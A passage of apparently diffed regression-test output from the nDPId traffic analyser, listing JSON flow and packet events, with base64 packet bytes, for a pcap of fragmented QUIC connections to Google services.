AJbB5BGGh\/yrQBy9y6a7q+P1hltskurz6iUjM71in38UzRyZojCOuaO6Q7QJeQvBcY+2qihs0FbDRsgigWTGzfjnSYa0tOUmlOdzI8uCwh7va3320+93h3I3V0faV6zxO50Au9kcqGGOEH12ZgVIt1bQdug2VBjCCj4ZbXJqLVuzhI96SplBcyo6UlwCnd09h5dMNn35qTkIiXou3NlcZ\/tYICl0xnfzAm0RxKz7INWJ+Pl4zSOjW44oFQwywPEE4MnpAbtWWGFRsesYIQtXXRapdS6Ha5rSylQcznied94Fdc28K\/TNM2dGosTNyEVqfCkfy1UU4pXqhmQ0m+rjS5SPefaGM\/ZPD3NALEgC7CILnzOB2B0di286grgHexJhCWlTHpcLt7yvnPnpvNTnwlX\/9e5CoKQXAkJPiDVcfLUGhluxsjbiqi4SZfvmdSRbJceWdtp0X6oS+wZzMuskEDHTOdTm8\/2jfc3WP6WQlIPINuCYViTLdF00mSEreSp+37OaIb2Rx6SPPD3UtpXaQ+xXSYus1Cf40a6k\/5iqSZBv7Fz9wAvqxvY\/FEStzmAQOKL6neOcR\/iuiKWOf9tLN1utG9qzj06bkXuF4PkrZOphQj91RQVjRHJE\/j47Lin6DaH6C5JcxMyymH9ObgTVyLE1e0B+wF06i5Hpk0EmLRJrJjURxyuhfANLHsp16+JhydB5\/grGxYRU3dFEB9114XRsU\/tiaZ2R5k2S89FboGA44VEliJWQ+CTSwLe5S+N2Dr44vXPvjO\/3OWWI7JX"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621489064431,"flow_last_seen":1621489064431,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621489064431,"flow_last_seen":1621489064431,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1621489064732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621489064732,"pkt":"AAAAAAAAAAQA8lpWCABFAAViarFAAH4RWU6fdbB8xkodT8LLAbsFTjgfxP8AAB0IkZSau0whIqIAAEU0J8TFf9\/VN5o0lGBaCguQoO02OQJilvANZtDrj\/OMFT5vVNrKFd7OCVag8EJVYHP5drDglbbDTRTqEryYKQXDwAjbQHCb4hSrdiCPrBiKGUysqjHibjMf\/\/cJtlkKUYMzu1OQDuQUj+9BuGidWSQXbdrGH\/cTlKPd+fyN5rndTfsi2anhztAx+d2YTQRUUekRhlHuVJJ4p2Z3IZFTAhuPV73fTbf4SPuN0fx\/zwW0yXmcrqFwPIt2QCjrijow3wd+KpIs8aCUsVA3tkWMowGKkarLcQuMXYVO22n13\/qzcKOa3k5hzYmf35naphUVFnOiktJs5QiID0Mr11P7nKWISepE\/LKfN5G+AyBbHafEcuSLG+dEVP8yUlkvIWHaglmQ7qizy0zJczKmfUmQ4tB8PkdGBsyVJGxcLh46gJws33Dq2OBt0nxBR63wvgp7Iary4iOfw\/IHL3ToumCAV\/dXmL2kmNgOH8id2nU8Nu+pL\/mFyecOQcSlSIelxqEkydSXxEN6pMAyMNNzbwL5ZSVp2Z7kNaBMx8OxLxM3MyXiXBmtzik8FiHJRBWbOiVcg6x+N7mPue3jU\/huf1f0BbINQqN\/HNFCVwUhYAaElxDE6W\/blagPEW7I+SBFkQnuMpiIU5olOZc0CA8vEyBMs1tdVjOahUyHy8OFPfa4AFVAWJFtweZG3vHwtK+CpbCbe4cAXN1BRfmIH18rN1CiM\/ld5AcYMoezZxV7vyfKJwA1l7ujoHiWN9N\/jrpLAvyVeal7LCBIIi0GZ9vgIHand1Crz4BVQdwhxX\/b1KPjn6A0R2aF+8O+Jk4noYbodAKmJ20EQ4Io4xNA8Y2lH3XGlWsRmrg8HB\/uQwODFlv4Oe\/aBKhU93ernwhJ5dNzrCWsNwJ3ixca321IQXfRagDxTu5nq\/rHSlaGZ8XpC4aiF+vcEUNT+D7buWqgbnGXDaQOWeV3rk3WWi5Xd4DtoiE+O8dxPSi9YsxFNyD+D1Fehvnge1XsEICUGBX1oA1lskHJpGPRUbaLRmjcWs1Ytuy8V8zbWNuhpR2uEU5FpDzQ9GGTEimYVW60syM+GZGoskPJK6zwMlYqVKL\/UK2+O6rkjDClgzO14h8Z6S6YGxcY4LhXA72k3F5H8sKLJMFB83CXn2nMGIYAKuT65vFY41aaqklz9NsRxW1YBg0jNa3ymere9qj2lEhOIgrb7GB+XkUkMf0QieDkM8pJSkzEXOFBLZfPAV3fLw3lZfe4s\/jN60uQMrcR88C9EnpOiOrBFZez0skinInExnzYEDkAtavtIsdoE71PRyR\/dHDCqzg7kZ18pLX6NjwVvyB1mlpdkMAVY1EdaRaeNmWPl40RA41HKTHrY+z6mtyrQLn5TgQXvZRMN76xUYz7ayMs5reGKxJhMrZqb6\/bIMRHi82Y4BJdVJJZgwj+sPhMg05o\/ukkRyzckGw\/OsW0tpPkLGLflVUuMWwcW3Yl7XXY9H4D+Gmk\/VQnSB5ldiKMcQlD5Nr524IdDK7HSP8PT17bN\/G71L8W4XQgg51GSgKjOUAB9S83oxZySOQTS0wV5NhNyS88WD5F0B8ngP\/B8chV5QevsF0LoPzzLZXg0AbR9bUfORgjfQ6jPb0UprPbX1e+36tDhCQ10Uh7j1e0kar55VVOgvNSJPW81uGBYWlpARxFyZgAbqvJ88OllqvEawT8k4\/1yAtxNXmYu6a0+vmPKpdv2NvRgtdznnjM6OaQG9AT9KHeWFinQcr3EhoXjjHZtcq2EfJF249Ule5A"} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1621489065332,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621489065332,"pkt":"AAAAAAAAAAQA8lpWCABFAAViarJAAH4RWU2fdbB8xkodT8LLAbsFTtRNzv8AAB0IkZSau0whIqIAAEU0tHfQYGgiJ0EH+RA73c0S6Zaq1R3\/CGoDzOwk4Q2KioTg4BPcXvMoegRpbrqCRaxPmqcY6POupt419T5yZmEB9o7YSIZtOKX53fGHCoc+ZsrZdAJTsVl0w90+Thu9tqk+WfepCoo+8ilF8eq+j6cYmQaoShwWbEH8aZWTDkaSoT09anmUbwmDVwEeDWMR2gVSbwwmv8rsQebDMqWs7OSh8srBRRpctj4tlSjdyXtQ\/UgrcQwLwZyJ9bsybxKQkPWcl8u0HzyojquwKL+JbZxKDXk1Pg7nHqmE0nKgm9VkdPudXzUwchL1ul3yO2j+uSSY2ucW6GJUzkbRuqcP05vN5\/18Mzh2lL9RaX2a5vbWSDbJPjG6on5UXS4AETy2nWNq1houkm3\/LsJAcFW+eybNMQ\/Nfc0orOQRsfJQyw7lxDL1ruzcECMi7m7+OPIDmAbmjAnyDrsC8setxlXVl5I8lkK9C2ve4qxQY7LHppOIbgqzCnXt9B18rSw2ymRIIb8dQ+M\/fx31qrhwE34LRBtwaOzL55FerimrdvtRhPE\/mv7IoDWsrrCajTyJVFlMWr2531Fxhp0DlBKapCIN6irm6NF41QYx7pEPTpaVM2SwERSQzVfsZROIRwvaACW8\/+fvwocDLWcyiM5VOq9hyWHb9QLQTSulOzEVAVmrwaA2Wc5frvDv0rMsW9gHUGuvWJwN9Krts73QCPZYA\/f1SV1AyEmPiYreXLu3MGFoUmEo\/LyVkXE4N1kExgUBnVeYUIGJRQKjBWutqE8sov37uQgss39hXvDSnclvpRoBNdSz2aaNs3R6Aic7VKt8gbyykfOIBA3Buq8zDmawY8YFdP1SsTa6np4zbntI9f+oNNrBriSQ14fbXVlNMQrhk1OYGIYbeXglU4ZIOKm77PLC2GR7SRTn1H4t2671bYr4eyrorlhGkzYuX1PeGMw\/j85u5uLrj61e2hEZJZD7r5x8MTQ1gOe4+Ph+Kz9X1vjFbsw9OmMDWkO65Ha+Cpf1ZHHApZ7QAuo5u2mG4Sp7g6rR1s5uclM6hCCnn2k2s8EDrb6RtHFjg3BneIS6SwSXyliDMHw0gO1PbIdSx1UUpSePV\/pCILKC\/M0H5LpPf\/59YwKN2B63+JAG1sL\/t2nutXsHIQzTGfUGp8q\/gu8\/oH2Pcsu\/oR96zl2VAWRwNCHmnnaZF9GJ22T7FDvnout2BFKs7xALVK\/GSWUrWW0DnJStDl6qSbXs+mlUPlFGuHBk4Eke31rEr4AxfQ2a\/9mZZog+0PD59WqfTjJ9R8bXy1KhNrHv56NiIqBiUw0rbG\/82hMaedg4sCu\/NdJjPtKJFvSXUMukKueAgyWcPj4sSLpvlA7iCI4ka\/RTTiki4Ye4QcJaaU15gJVIwcMMNnbkXWv\/HhOCwgK6cReevf96zzpUj1c84N8PWt9IEX6REFpHkIe9y3OvWTzdASwXJ9ovv1G9SjXfvrI7XedRdAxpB2vsQYi5gwEy3zTb3EFTDheiNc9y\/MCzHpVCklw85aHzUyvlzbZikqniVBAqAJensYNeu3p1TfbVsgAsy2eW\/hv+DDPc5Am8kV01z+FVZJbVWMPq0+tF6tPJo+fDG6\/w2\/eu949hx2pjfKmhp3d5IX0vfNEJhDKZIgmFV4d0I2S35UzYShoVcEpOEWvsBojm\/XwBtXsjwpE570c8CRHk7pLygTlIjRIrEQN0O6eP3A7nIZP\/sV9waxu2fmgOUmfKn8+KMxaVZv4SRaTB7ghieqbWD5Y61rshpqaP"} -00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621488172593,"flow_last_seen":1621488174706,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489066532,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621488172593,"flow_last_seen":1621488174706,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489066532,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00603{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":94,"packets-processed":93,"total-skipped-flows":0,"total-l4-payload-len":125550,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":66,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":66,"total-idle-flows":65,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":296,"global_ts_msec":1621490937698} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490937698,"flow_last_seen":1621490937698,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1621490937698,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490937698,"pkt":"AAAAAAAAAAQAxdZsCABFAAViDl1AAH4RTzw0uxSvdlnaLuMLAbsFThsNyv8AAB0Is32f4l9Pl3YAAEU0hQvFkzqCFRJrzdm+P7CepRPizYj8V5fWvrVXzVuBf2NRkl3eGWbs2YtmOjlr1x\/pBPc\/7TLqG34Khp0PMlFKcz3fdNeoXKYeyR\/Hs72zcRs4hnEn+4P6mPqm5uCsv8fDjYHuJRIAjvSHTbEdxqgFHEd93118utoyjtMgpgcEbs4fXoPb8uDAHM5T4MCKj6qQNjX6I7nNo6EuPNWQg9gu3uCawN9k7BQzQN6E5YfL1AdHh4udF7sZw+dow9sF\/laxj49FS3UXGVaahEsCE3aD2597p7TwOCMsaP9cpJ6+mt4daKLcDJnJAMt+icMAtT9fzWBRO4vYi5NQjh2DPs+GRWiTKh8dxvVzhRom8\/iF8KHgTJy3pWtXKlPeLfZAL3oZX5hiz2PB+HTVur2l5vjVWa6EpaFOaRykdvEuLIieDh5u0ZCT5hWtho28j2TyUwsZurEURzu6rl34H7da+I6rfvvL\/zNBXRl0T5rIEnMLL\/j4r9tphU2zm73BBkXS2V8NqavgjXhm8kqC3c5AZmhcVx3aPVo+42Q3ezUT39SUVKQVNHXmiaFVKiSaFUFlpUHrBUR8nGg2CAYm5iRBq\/qCatZ+wKK6Jor9Aelj+kTAnp5y3Y17HPQCp3A9e7GN\/AQvzanaLBchENACUbp6PsLPG0WwONlg5LquPMp39gYOflC9I0cMA9lanerY2UKd2DIvHrNxINIhafo64dTHQ2kruV+pvFVizjiYGEPTHm5vnjJ+vNgtO8FZ6Eymo8qJM5A2+vwe1kvg4nJxdm2E2Wn9X7T70nm++uQBCATbDwLy4YWKSHsoUqqJOZluOGYa1wXb4e+XDlmQzD44JyGBZoUrd+\/dh+KC7bZ6++qLMza7R\/lgjP\/l01SyMjsktR9TKWRx8l\/pSrp2aBkNYKphapPAf6rVSB6qqzYptEM4+9RgL5fiahM9zZLohrgrmNstzopEBbSjJHKT2BtkCePCTq9BXTY9wpytpKjLROzmBJcxKjOlKnF1g\/rktfgoVBF1SKnq6hR2PLzX3pKRc\/RptOGJ8gayhpr53uiIJElSTx+gWcAQGtbS9w40dA7UdV0kQrKTsOlEZPv4Wf1DZo6smp3gIVuDDknJHBV+79Kgv5HRfK28giV9WHGfmEktaajImtic0wa4l7nZNKYEOG\/CyBNl4UHMG4iNm+Y40wSoxegD3OA3LFE2Tr3WxLZaukNoA74zUcX2aqS0oIhr43+nrWk7rEOCNY9O2hGcdnBoVGgvgYX\/gYhzcOFnVXvBYg+04X1\/Lu6Je6ysBSIVyex9isvdPzkU7pOxMaiH3uzhIu6T+pp2pHExh+9q+rK10SAGliPxRu5zXtXE3Oy94SyfUjETd0qOQfmkHBz\/e9FYgFyyAkQn3MHd3fMmxpKxNsGPMBp\/cSG\/LANkIApGSvPXTwNw1vUedAoCnyCDwQXlWFtAwyohCNg2btp5ZVrwJqBGM7vTCz+QiD2xs1qEthiBEr8j6ftBwGUP9P0OZX\/LFSLwiLgDLEHK\/768YbCSvzW3RfUSDD4sBnSpdyK4zahGcrI93nPJV2g2l0hHyyPgJ7X+z4BRD+aEuHW6lUHeG3Oj5Qh+Vsi8uKdlG0jwjTzMAg3f97PU4FGrQ+RjmPIPZIj9zzw+nTMrJSpqyIKsK7h2bGHuUUNWEUnH05Zth20+XAUcAWRC4suUp9EI8SZymgXxcd3IQ5KrKIi3GAnhHbFpy9beC1dCN5olmWNLOL3oSxQHzr7fvKwFtpOssY7Sag281T8O6Eak"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490937698,"flow_last_seen":1621490937698,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490937698,"flow_last_seen":1621490937698,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1621490938810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490938810,"pkt":"AAAAAAAAAAQAxdZsCABFAAViDnRAAH4RTyU0uxSvdlnaLuMLAbsFThUFyP8AAB0Is32f4l9Pl3YAAEU0YOqdYTCCZZmk+g3+J22oWfx0doVS585v5dZuMcju6ceFUGjlxObU5iFwgva6ib0ak1Tmez5R8snBJP694+WPYbwvpl7HFaYBb32L02hySVgOT1FTMmvBo2Fo\/d5ANfZGxJNDQBrucO2wU26mhDDIiJWiWYLyLw+2wH9XtUY9hKwoMo3iFTjxOO1dnynX63OlfxLKWOPNDL\/CJlgdgaNXHQV7leuc3Xd6jzLAetIP1cBEVuqCfGK1Z\/PwWhV\/ilCFb3DMmIz+HaenysHXzEImv5aEb6mec8YzM\/GvxDGp1tCbktIjpAUlEhPRXGKZ8L0YQpyXKVC37At+Ncsh7AGMJvk0puDbiFW8meTwbKSAn\/sAaruKCEiN7ZpDtZ6AQjgTjJIChfbGSU8bd6+hfwBxOU5JZ5xFfQWmRvrx7dy8X8kvYMhYuvkFi3w9Ni2RFiXvTVu8VuiANv809cCo09xvlNkdw1DO\/WJmXRsdf1Y0IqaxV5KrebivhDDNQHtyrnyfrxQ5Y4ift5qmodWeoxdiidD7RJxvcyaRuheSGzXqxC4lIAiMQlrcqXvPnq3wegxcfrIRDEWEavybtNijaDhbp2eu65kvOP5wXZMNleDGBSxQdgktQpxL6TcHQlqLOjfCNHdixljqRof7DPO+5RBSaRguaP\/xe1GoZxspva5ZE9Xk+Xf3SmMHKKlPy59QkuWoIaGOiB7N7I1DAInixS\/jVOIySTOq4xF2KnvU1cEtEoyV42Mhr2KORjN9TpQKBy7JF6wcPKs2Pl3baeiEyYmSdleQIgMxFgrcHJCi21HOjSroXF4HIUsE2apsLaSuZKIs6JTyYJ6qUdjIGm424\/UHHh7fS4g4qA\/yUxx\/xBalncHIA4CjURBqXagq47c2XNGvnlFEquS6V7HZy9x27CFukTSbeIjgcRxXOAJzUlJ1yQ5t5JkOgB8oPDo7vO1NPT7iXgezGOshBG3qxRqw4FUz7pY+auLAGyFbA\/lsmtbgOLGTcFptcsDFuxveiIqXNb3fggSAG9Jq3G4TYmnIqNqka7HhL+stsx9khyR4A9gCtftmEfOrTTxMftEStlT5QLserQlCNp0N1XklnoOsNOcDxQty6hF3nIOhScEBVKysqeVEbi4UdZcUA64KdSVhoAaFJgUYzqosBYVtSdq6oVjC3rbAJ92pfW7W5fHOO\/Gzz4rjoa6QO0jRV4cCPZLQqvL7Whl8UxlUFbNLzMyEaywNzMDAb8u4rh5j\/o9WJorChNDzH+7aC1pGc2DBqQhx+NA2UfbkgudimG0uOmYNVjS1IS1bDSwBdSH7GNbNFSEkwovorAkgGXCiJsNN1cNIzzCohUj5lfbIM4g5Mr+pCB40oATdPIus6Jzb2ASLd\/9Q3sKnYlXjoEthW4ZxmNASLbj3i11YfRdbW\/XSJmbOzbWEbGkTfP\/k6k8tNozfErQYaqQcQWy1XNJfDiRBXvvfoE3+y9U2kVEyp3L6AC1g\/JNMxiXgENUxOjpl9VPREmrP\/Rjthtz9gSXutw7+EZR3faEchxgczJKIbKwYHcJXGoSYCA8W3Hk3Zf+L+BJmdrRVHbtPRFqDPup8RvGlcW5Xzoa4vRRZbXHIKNQitatbh6+9\/gMI9RgLPzmaVU\/Vp8RntOXhKOwTec+\/5p5Qci1058hGbPEcEz9RH7ho4Uxp4mI0kI9Cy+wNwmwipQYYPfi742YDYxomWF7pzIij4vCMpGVsjxYg5gSAF5wb8qbS5fVF7UlGZOWJLoEHBgMVPUjuR95n2f0L"} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490940042,"flow_last_seen":1621490940042,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490940042,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1621490940042,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621490940042,"pkt":"AAAAAAAAAAQA\/nCGCABFAAViEwhAAH4RoqY0uxSvedF+ofgTAbsFTmycyf8AAB0IX1A3NmSMbKUAAEU0Pg8s+OhkXllUqtMD1WTcO9yjUOzCG24snxvIngH7iX6ehFgoF1UYrfDy88XdHomQKlyLms0u9jlYkrqEodLauJRGapy4Hle2I8WKWHQL1rTKZH+tzK8ow8MeqFRrpbk8\/iokxoMoLXgVKCOwqLL7oRfGteGHJcbAGqvj5rPWn8lTHy\/nr7UNzD5DIeg4hTPlFVFboFc96\/ePrxRP6\/CWV2PQluHrHP+UDiuvF+\/WgxAU4Zaq\/s2euO20g4VMq4g6z0hkNtHxIuQ6G6ZlVXeT6uBX6ZPVEg0pfUhEvbGjqyM68S7s\/LuqkjtoK8zch\/4QBOjnMBjjSQwLMYWrIngHxIgbqBSyCkOJ+S+nMOeH0cA+0cnqBY4O49ufQhXDRjEGH5t5soDhhzS8sBGOiS03hbrWi+tm95qnkQ4EY7uhdczTXrlpbhNUdpcyH4wC71tfxfvQVS5y8IC1e8zT5BsHNYmBSU3cCiepaiVmZYJcGPmbBd0EWBl43HnBPIQ8CwCcoTjwgg26Yu4ozcj0BKQFUR0GMUF83l1lF8ot6wXFAA+oVj8seMzHzv2II23OXhbg44qPmITHSEYOmk8bA8y9XUBg7ALjZ36C005quDVZGN0J+Q44oR4tlRYPB94GZr5laHx3xI4zV2UfRy01CNaSkDMoeOEOMaeAi4kFgFipvCE1jwRUNvw9Vqe2+hR\/wsE+qJ\/zc31inDfEFutt+QNKxDy+c5v2szwudCf+3lADM5GAPJCWo+Nv3ArVcoU95DnZ8Qni4gFNPIas7CUUE3oqubppTtj9Kw2C\/6AvXyw4q7FUZBaXB5X4zjUqQWxcc20sJRmNfK46tma+3YZBWJZSVhtM4pRqEfs362IPwcZpvzz9KMT1frJPvZSyqCg5WxsuShHYKbtQca6juA82VMIw7n0mkTmMIQQq9Mj1AYJMVxWSFfEi9dTleToj9MJ1kk9djU0M9qoCSBeOLKZOaO7ZMQoI+LQb5AKLobDEPmCM\/+7vqosV0xxNb5\/8d22vjMPjhhUJQCLCU0zSX2v8r8IeoTWvGuTd36jZKvjkA9tWHYu73L8Z1+CH8Cei7yWoKXUBW3fDckkX+B50D9QGMtC\/RL4c6YIkI006jUdtSCby+AjkkzqsejzwjNaUTji4RgY8P93\/urJ7QidOPx7hxI6\/TCZFHC3NSWXM8bWJhPqBFEUJXD3S1Xr4e\/XJX4lmJ\/Ol5PgUeFwl29wp8pAoUmC4cRILuSnQY4l9xAdZlPqyDmbVu\/SSWy2Akqi5xJqxDVEON1HIuVfAYg1i119Yr7dWU5QplKsuqzsu4hfLJ6M8Yw5ZRJVC7RSE3r\/N0XrnFY73pQjDIXk9UmcxBojTmmq+gMcamIBeoL0S0ukwFhIcT6HHQfqlw0OzdXB1KL44BXZ9G2XIbRiRgnhcLeXH05qnfpT5pUwkVHt9m7ibHbmqRFCjXSOFgriLQZGqyYKgC+7F70lj6Mklvy+ynXaGzESE6icJU\/STfU04WOE\/XjvOrRE8MvWUxGzhOBNeg4DukKHrJE7SlhswBlqxEdAUp1sFZsl\/6UVWCheylk3qxVcmo08I0V6U82TPQllNBHQQvLwa1Hz1qkNj0H98MIqjYsZiUPrT9PHl\/EubC5Mxf+rACdfBZZVOf7ZrGTAkVMqdQkNJ4KAoV4KyVWs727STfm\/XXQbuh+KdV53N3ZDf84eN9hHsz6Xg77mwy7PCShrWSrFEAyXWlin+he1NMoCnvMEs3ErNthA178U9LrQNGhrOQxjMONlj"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490940042,"flow_last_seen":1621490940042,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621490940042,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients2.googleusercontent.com","user_agent":"dev 